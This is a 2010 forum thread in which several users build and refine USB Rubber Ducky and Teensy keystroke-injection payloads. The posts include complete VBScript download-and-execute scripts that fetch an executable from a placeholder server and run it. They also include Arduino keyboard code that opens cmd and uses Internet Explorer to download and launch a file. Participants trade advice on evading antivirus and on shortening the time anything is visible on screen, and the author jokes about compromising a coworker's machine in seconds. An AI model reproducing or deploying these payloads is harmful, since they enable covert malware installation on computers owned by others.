nox404 Posted April 20, 2010 Share Posted April 20, 2010 Maybe something like this would work have the duck load up cmd and type in... echo Dim DataBin >dl.vbs echo Dim HTTPGET >>dl.vbs echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >>dl.vbs echo HTTPGET.Open "GET", "http://YOURWEBSErVER/test.exe", False>>dl.vbs echo HTTPGET.Send >>dl.vbs echo DataBin = HTTPGET.ResponseBody >>dl.vbs echo Const adTypeBinary=1 >>dl.vbs echo Const adSaveCreateOverWrite=2 >>dl.vbs echo Dim test1 >>dl.vbs echo Set test1 = CreateObject("ADODB.Stream") >>dl.vbs echo test1.Type = adTypeBinary >>dl.vbs echo test1.Open >>dl.vbs echo test1.Write DataBin >>dl.vbs echo test1.SaveToFile "file.exe", adSaveCreateOverWrite >>dl.vbs dl.vbs file.exe exit this code will make a vb script that will execute and download a file from a web server. Then you run the file. There a few Anti Virus that detect this as bad but with some changes it will run good. I Will be testing it here soon once my ducky gets here. Tell me what you guys think? Quote Link to comment Share on other sites More sharing options...
illwill Posted April 20, 2010 Share Posted April 20, 2010 as far as I know that was blocked by Microsoft with a killbit entry in the registry years ago You would have to delete this key first to make it work HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000566-0000-0010-8000-00AA006D2EA4} Quote Link to comment Share on other sites More sharing options...
nox404 Posted April 20, 2010 Author Share Posted April 20, 2010 tested it on windows xp vista and win7 all of it works. Quote Link to comment Share on other sites More sharing options...
Sebkinne Posted April 21, 2010 Share Posted April 21, 2010 Works but is recognized by most AVs as an exploit... But good work anyway Seb Quote Link to comment Share on other sites More sharing options...
nxt471 Posted April 21, 2010 Share Posted April 21, 2010 Could not test it on a VM, AV blocked it as I saved it. I guess you could type it in manually, AVs are not looking for what you type, only the files. Quote Link to comment Share on other sites More sharing options...
Sebkinne Posted April 21, 2010 Share Posted April 21, 2010 Actually, the av will recognize it when the ducky just creates it like above in the CommandPromt.. when you write the commands to the file dl.vb with the > and >>, it writes to the file. once the last part of the file is complete, the av will call it, because it monitors files that are JUST being written to... so, a different method needs to be found... Quote Link to comment Share on other sites More sharing options...
nox404 Posted April 21, 2010 Author Share Posted April 21, 2010 Yes, this is very true that AVs will find it. I was thinking of using windows built in ftp but the firewall by default blocks it. How about this guys. <start from cmd> prompt>> "C:\Program Files\Internet Explorer\iexplore.exe" www.YOURSERVER.info/nox404/test.exe alt-r alt-r prompt>> exit I tested this with internet explorer 8. This will open internet explore to a file. From there it will ask you to run download etc... you hit alt-r this will run the .exe and then again alt-r. at this point you will have executed the file. Then type exit walk away. This happens very fast the IE window dos not stay open it will close on its own. I tested this out with a small bot (10kb) and it worked great almost instantaneous. What do you guy think? PS. I will be getting my ducky today(at least that what UPS says). Then i can start testing out real world applications. Quote Link to comment Share on other sites More sharing options...
nox404 Posted April 21, 2010 Author Share Posted April 21, 2010 (edited) void setup() { } // no setup needed void loop() {   delay(10000);   // Windows key    Keyboard.set_modifier(MODIFIERKEY_GUI);   Keyboard.send_now();   // Windows Key + R to open run   Keyboard.set_key1(KEY_R);   Keyboard.send_now();   // releases the keys   Keyboard.set_modifier(0);   Keyboard.set_key1(0);   Keyboard.send_now();   //delay for computer   delay(500);   //send cmd into run   Keyboard.print("cmd");   // for the computer   delay(50);   // This hits the enter key   Keyboard.set_key1(KEY_ENTER);   Keyboard.send_now();   Keyboard.set_key1(0);   Keyboard.send_now();     //Testing Delay   delay(500);   //Send exit to cmd.   Keyboard.print("\"c:\\Program Files\\Internet Explorer\\iexplore.exe\" www.YOURSERVER/nox404/THEFILE.exe");     //  Hits Enter key   delay(50);   Keyboard.set_key1(KEY_ENTER);   Keyboard.send_now();   Keyboard.set_key1(0);   Keyboard.send_now();     //ALT-R   delay(3000);   Keyboard.set_key1(MODIFIERKEY_ALT);   Keyboard.send_now();   Keyboard.set_key1(KEY_R);   Keyboard.send_now();   // releases the keys   Keyboard.set_modifier(0);   Keyboard.set_key1(0);   Keyboard.send_now();   //ALT-R   delay(3000);   Keyboard.set_key1(MODIFIERKEY_ALT);   Keyboard.send_now();   Keyboard.set_key1(KEY_R);   Keyboard.send_now();   // releases the keys   Keyboard.set_modifier(0);   Keyboard.set_key1(0);   Keyboard.send_now();   // another delay :)   delay(100);       //Send exit to cmd.   Keyboard.print("exit");     //  Hits Enter key   delay(50);   Keyboard.set_key1(KEY_ENTER);   Keyboard.send_now();   Keyboard.set_key1(0);   Keyboard.send_now();   //this stops it from re running for a bit   delay(500000);   } This is code that i have tested on 4 systems here win7 twice and vista twice. This executes explorer and downloads the file running it in the process. will change it up so that i can do it all from the run prompt. Tell me what you guys think. O yeah got the Ducky today thing works like a charm. Edited April 21, 2010 by nox404 Quote Link to comment Share on other sites More sharing options...
Sebkinne Posted April 22, 2010 Share Posted April 22, 2010 This is code that i have tested on 4 systems here win7 twice and vista twice. This executes explorer and downloads the file running it in the process. will change it up so that i can do it all from the run prompt. Tell me what you guys think. O yeah got the Ducky today thing works like a charm. Looks good, I will try it out on a range of different machienes, good work! Seb Quote Link to comment Share on other sites More sharing options...
AndrewFaulds Posted April 22, 2010 Share Posted April 22, 2010 (edited) Maybe something like this would work have the duck load up cmd and type in... echo Dim DataBin >dl.vbs echo Dim HTTPGET >>dl.vbs echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >>dl.vbs echo HTTPGET.Open "GET", "http://YOURWEBSErVER/test.exe", False>>dl.vbs echo HTTPGET.Send >>dl.vbs echo DataBin = HTTPGET.ResponseBody >>dl.vbs echo Const adTypeBinary=1 >>dl.vbs echo Const adSaveCreateOverWrite=2 >>dl.vbs echo Dim test1 >>dl.vbs echo Set test1 = CreateObject("ADODB.Stream") >>dl.vbs echo test1.Type = adTypeBinary >>dl.vbs echo test1.Open >>dl.vbs echo test1.Write DataBin >>dl.vbs echo test1.SaveToFile "file.exe", adSaveCreateOverWrite >>dl.vbs dl.vbs file.exe exit this code will make a vb script that will execute and download a file from a web server. Then you run the file. There a few Anti Virus that detect this as bad but with some changes it will run good. I Will be testing it here soon once my ducky gets here. Tell me what you guys think? Why the echo commands? copy con is more efficient ;) Just do: copy con dl.vbs[RETURN] Dim HTTPGET[RETURN] Set HTTPGET = CreateObject("Microsoft.XMLHTTP")[RETURN] HTTPGET.Open "GET", "http://YOURWEBSErVER/test.exe", False[RETURN] HTTPGET.Send[RETURN] DataBin = HTTPGET.ResponseBody[RETURN] Const adTypeBinary=1[RETURN] Const adSaveCreateOverWrite=2[RETURN] Dim test1[RETURN] Set test1 = CreateObject("ADODB.Stream")[RETURN] test1.Type = adTypeBinary[RETURN] test1.Open[RETURN] test1.Write DataBin[RETURN] test1.SaveToFile "file.exe", adSaveCreateOverWrite[CTRL+Z] file.exe[RETURN] exit[RETURN] Edited April 22, 2010 by AndrewFaulds Quote Link to comment Share on other sites More sharing options...
fjux Posted April 22, 2010 Share Posted April 22, 2010 (edited) then what about this? when a vbs script is activated the command promp is imidiatly back. it doesnt wait for it to finish so i think that the code from the fisrt post wont work propperly with bigger files. so why not let the VBS execute the file. its only 3 lines. Dim DataBin Dim HTTPGET Set HTTPGET = CreateObject("Microsoft.XMLHTTP") HTTPGET.Open "GET", "http://www.domain.com/file.exe", False HTTPGET.Send DataBin = HTTPGET.ResponseBody Const adTypeBinary=1 Const adSaveCreateOverWrite=2 Dim test1 Set test1 = CreateObject("ADODB.Stream") test1.Type = adTypeBinary test1.Open test1.Write DataBin test1.SaveToFile "file.exe", adSaveCreateOverWrite Set shell = CreateObject("WScript.Shell") shell.Run Chr(34) & "file.exe" & Chr(34), 1, false and also you can put all the echo's in 1 string. so the waiting time is less then having to wait till the promt comes back up again. it will look something like this: echo Dim DataBin>dl.vbs && echo Dim HTTPGET>>dl.vbs && echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP")>>dl.vbs && echo HTTPGET.Open "GET", "http://YOURWEBSErVER/test.exe", False>>dl.vbs && echo HTTPGET.Send>>dl.vbs && echo DataBin = HTTPGET.ResponseBody>>dl.vbs && echo Const adTypeBinary=1 >>dl.vbs && echo Const adSaveCreateOverWrite=2 >>dl.vbs && echo Dim test1>>dl.vbs && echo Set test1 = CreateObject("ADODB.Stream")>>dl.vbs && echo test1.Type = adTypeBinary>>dl.vbs && echo test1.Open>>dl.vbs && echo test1.Write DataBin>>dl.vbs && echo test1.SaveToFile "file.exe", adSaveCreateOverWrite>>dl.vbs && echo Set shell = CreateObject("WScript.Shell")>>dl.vbs && echo shell.Run Chr(34) ^& "file.exe" ^& Chr(34), 1, false>>dl.vbs and then all what is left is to run it and exit CMD: promt> dl.vbs promt> exit i think this is the lowest time possible being at the command promt. or someone needs to find a way to srink the VB script even more! that would be awsome! since i didnt got selected for a dev kit i am thinking of buying my own teensy. though a q? i read that darren is useing the original one. but i checked the site and all of their stuff uses mini usb. any good/simple way for a converter (buy a self making is oke) cheers! Edited April 22, 2010 by fjux Quote Link to comment Share on other sites More sharing options...
AndrewFaulds Posted April 22, 2010 Share Posted April 22, 2010 then what about this? when a vbs script is activated the command promp is imidiatly back. it doesnt wait for it to finish so i think that the code from the fisrt post wont work propperly with bigger files. so why not let the VBS execute the file. its only 3 lines. Dim DataBin Dim HTTPGET Set HTTPGET = CreateObject("Microsoft.XMLHTTP") HTTPGET.Open "GET", "http://www.domain.com/file.exe", False HTTPGET.Send DataBin = HTTPGET.ResponseBody Const adTypeBinary=1 Const adSaveCreateOverWrite=2 Dim test1 Set test1 = CreateObject("ADODB.Stream") test1.Type = adTypeBinary test1.Open test1.Write DataBin test1.SaveToFile "file.exe", adSaveCreateOverWrite Set shell = CreateObject("WScript.Shell") shell.Run Chr(34) & "file.exe" & Chr(34), 1, false and also you can put all the echo's in 1 string. so the waiting time is less then having to wait till the promt comes back up again. it will look something like this: echo Dim DataBin>dl.vbs && echo Dim HTTPGET>>dl.vbs && echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP")>>dl.vbs && echo HTTPGET.Open "GET", "http://YOURWEBSErVER/test.exe", False>>dl.vbs && echo HTTPGET.Send>>dl.vbs && echo DataBin = HTTPGET.ResponseBody>>dl.vbs && echo Const adTypeBinary=1 >>dl.vbs && echo Const adSaveCreateOverWrite=2 >>dl.vbs && echo Dim test1>>dl.vbs && echo Set test1 = CreateObject("ADODB.Stream")>>dl.vbs && echo test1.Type = adTypeBinary>>dl.vbs && echo test1.Open>>dl.vbs && echo test1.Write DataBin>>dl.vbs && echo test1.SaveToFile "file.exe", adSaveCreateOverWrite>>dl.vbs && echo Set shell = CreateObject("WScript.Shell")>>dl.vbs && echo shell.Run Chr(34) ^& "file.exe" ^& Chr(34), 1, false>>dl.vbs and then all what is left is to run it and exit CMD: promt> dl.vbs promt> exit i think this is the lowest time possible being at the command promt. or someone needs to find a way to srink the VB script even more! that would be awsome! since i didnt got selected for a dev kit i am thinking of buying my own teensy. though a q? i read that darren is useing the original one. but i checked the site and all of their stuff uses mini usb. any good/simple way for a converter (buy a self making is oke) cheers! Uh.... You can't have multiple echo commands in a line. And as I stated earlier, "echo something >dl.vbs" is less efficient than just copy con. Quote Link to comment Share on other sites More sharing options...
fjux Posted April 22, 2010 Share Posted April 22, 2010 yes you can have multiple echo;s in one line. it is separated by && and cmd recognises it as a new command. i was thinking of this for at the run box. cmd.exe /c <command> though the command was to long for the box. when i order my duckey i will try both ways wich one is faster to execute Quote Link to comment Share on other sites More sharing options...
AndrewFaulds Posted April 22, 2010 Share Posted April 22, 2010 yes you can have multiple echo;s in one line. it is separated by && and cmd recognises it as a new command. i was thinking of this for at the run box. cmd.exe /c <command> though the command was to long for the box. when i order my duckey i will try both ways wich one is faster to execute Still, copy con is more efficient. Quote Link to comment Share on other sites More sharing options...
nox404 Posted April 23, 2010 Author Share Posted April 23, 2010 void setup() { } // no setup needed void loop() {   delay(10000);   // Windows key    Keyboard.set_modifier(MODIFIERKEY_GUI);   Keyboard.send_now();   // Windows Key + R to open run   Keyboard.set_key1(KEY_R);   Keyboard.send_now();   // releases the keys   Keyboard.set_modifier(0);   Keyboard.set_key1(0);   Keyboard.send_now();   //delay for computer   delay(500);   //send cmd into run   Keyboard.print("cmd");   // for the computer   delay(50);   // This hits the enter key   Keyboard.set_key1(KEY_ENTER);   Keyboard.send_now();   Keyboard.set_key1(0);   Keyboard.send_now();     //Testing Delay   delay(500);   //Send to cmd.   Keyboard.print("\"c:\\Program Files\\Internet Explorer\\iexplore.exe\" www.YOURSERVER/nox404/THEFILE.exe");     //  Hits Enter key   delay(50);   Keyboard.set_key1(KEY_ENTER);   Keyboard.send_now();   Keyboard.set_key1(0);   Keyboard.send_now();     //ALT-R   delay(3000);   Keyboard.set_key1(MODIFIERKEY_ALT);   Keyboard.send_now();   Keyboard.set_key1(KEY_R);   Keyboard.send_now();   // releases the keys   Keyboard.set_modifier(0);   Keyboard.set_key1(0);   Keyboard.send_now();   //ALT-R   delay(3000);   Keyboard.set_key1(MODIFIERKEY_ALT);   Keyboard.send_now();   Keyboard.set_key1(KEY_R);   Keyboard.send_now();   // releases the keys   Keyboard.set_modifier(0);   Keyboard.set_key1(0);   Keyboard.send_now();   // another delay :)   delay(100);       //Send exit to cmd.   Keyboard.print("exit");     //  Hits Enter key   delay(50);   Keyboard.set_key1(KEY_ENTER);   Keyboard.send_now();   Keyboard.set_key1(0);   Keyboard.send_now();   //this stops it from re running for a bit   delay(500000);   } This is code that i have tested on 4 systems here win7 twice and vista twice. This executes explorer and downloads the file running it in the process. will change it up so that i can do it all from the run prompt. Tell me what you guys think. O yeah got the Ducky today thing works like a charm. Change a line in the code. Now: //Send to cmd.   Keyboard.print("\"c:\\Program Files\\Internet Explorer\\iexplore.exe\" www.YOURSERVER/nox404/THEFILE.exe"); To: //Send to cmd.   Keyboard.print("\"c:\\Program Files\\Internet Explorer\\iexplore.exe\" www.YOURSERVER/nox404/THEFILE.exe && exit"); **Thanks to fjux for showing me that "&&" works in Windows to add another command. This will close CMD after lunching explorer. This code is tested and works better then before. With about 15 seconds, i can compromise a system. IT guy at work logs into my system then somehow i make him look away plug this bad boy in and bam! j/king would never use this for "evil". Requests: Can some of you guys that have one do some testing on the delay timers and see what you guys find it the best amount of time. All of the ones i have set up are there for testing so there a bit long. Quote Link to comment Share on other sites More sharing options...
fjux Posted April 23, 2010 Share Posted April 23, 2010 i still like the VBS way of downloading more cos of the less time it shows something on the screen. but if you want to do it that way, i recommend just doing it in the run box. like: "c:\\Program Files\\Internet Explorer\\iexplore.exe" www.YOURSERVER/nox404/THEFILE.exe that does the same, without showing the cmd at all ;) Quote Link to comment Share on other sites More sharing options...
AndrewFaulds Posted April 23, 2010 Share Posted April 23, 2010 i still like the VBS way of downloading more cos of the less time it shows something on the screen. but if you want to do it that way, i recommend just doing it in the run box. like: "c:\\Program Files\\Internet Explorer\\iexplore.exe" www.YOURSERVER/nox404/THEFILE.exe that does the same, without showing the cmd at all ;) Or, even better: Open the run box, type iexplore http://attacksite.com Quote Link to comment Share on other sites More sharing options...
nox404 Posted April 23, 2010 Author Share Posted April 23, 2010 Sorry do not get me wrong, I love the fact that you guys are actively talking and working on the Vb-script. I am just working on every way i can think of downloading a file using Ducky. To me Ducky is more of a crafted tool less of a hacksaw own everything. More of a i got a target so let me use vb script to download files if they do not have and AV that blocks it or let me use the Explorer method. I'm Hoping in the long run people will take the information in this thread and add it to wiki as download methods (I will do it once the wiki is up and i find the time). Thank all of you for looking into these methods and helping me refine them! ** I tested out the Vb script at work and it works flawless on are test system. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.